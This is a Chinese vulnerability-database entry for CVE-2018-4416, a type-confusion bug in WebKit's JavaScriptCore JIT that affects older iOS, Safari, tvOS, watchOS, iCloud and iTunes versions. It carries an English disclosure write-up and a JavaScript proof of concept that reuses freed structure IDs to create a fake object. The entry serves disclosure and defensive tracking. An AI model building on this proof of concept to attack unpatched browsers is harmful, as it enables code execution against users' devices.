多款Apple产品WebKit 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1377122 漏洞类型 缓冲区错误
发布时间 2018-12-03 更新时间 2019-04-09
CVE编号 CVE-2018-4416 CNNVD-ID CNNVD-201810-1518
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018120014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1518
|漏洞详情
Apple iOS等都是美国苹果(Apple)公司的产品。Apple iOS是为移动设备所开发的一套操作系统。WebKit是其中的一个Web浏览器引擎组件。tvOS是一套智能电视操作系统。Safari是一款Web浏览器,是Mac OS X和iOS操作系统附带的默认浏览器。 多款Apple产品中的WebKit组件存在安全漏洞。攻击者可特制的恶意Web内容利用该漏洞执行任意代码(内存损坏)。以下产品和版本受到影响:Apple iOS 12.1之前版本;tvOS 12.1之前版本;watchOS 5.1之前版本;基于Windows平台的iCloud 7.8之前版本;iTunes 12.9.1之前版本;Safari 12.0.1之前版本。
|漏洞EXP
WebKit: JSC: JIT: A bug with JSPropertyNameEnumerator 

CVE-2018-4416


When a for-in loop is executed, a JSPropertyNameEnumerator object is created at the beginning and used to store the information of the input object to the for-in loop. Inside the loop, the structure ID of the "this" object of every get_by_id expression taking the loop variable as the index is compared to the cached structure ID from the JSPropertyNameEnumerator object. If it's the same, the "this" object of the get_by_id expression will be considered having the same structure as the input object to the for-in loop has.

The problem is, it doesn't have anything to prevent the structure from which the cached structure ID from being freed. As structure IDs can be reused after their owners get freed, this can lead to type confusion.

PoC:
function gc() {
    for (let i = 0; i < 10; i++) {
        let ab = new ArrayBuffer(1024 * 1024 * 10);
    }
}

function opt(obj) {
    // Starting the optimization.
    for (let i = 0; i < 500; i++) {

    }

    let tmp = {a: 1};

    gc();
    tmp.__proto__ = {};

    for (let k in tmp) {  // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator.
        tmp.__proto__ = {};

        gc();

        obj.__proto__ = {};  // The structure ID of "obj" equals to tmp's.

        return obj[k];  // Type confusion.
    }
}

opt({});

let fake_object_memory = new Uint32Array(100);
fake_object_memory[0] = 0x1234;

let fake_object = opt(fake_object_memory);
print(fake_object);

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: lokihardt

|参考资料

来源:securitytracker.com

链接:https://securitytracker.com/id/1042003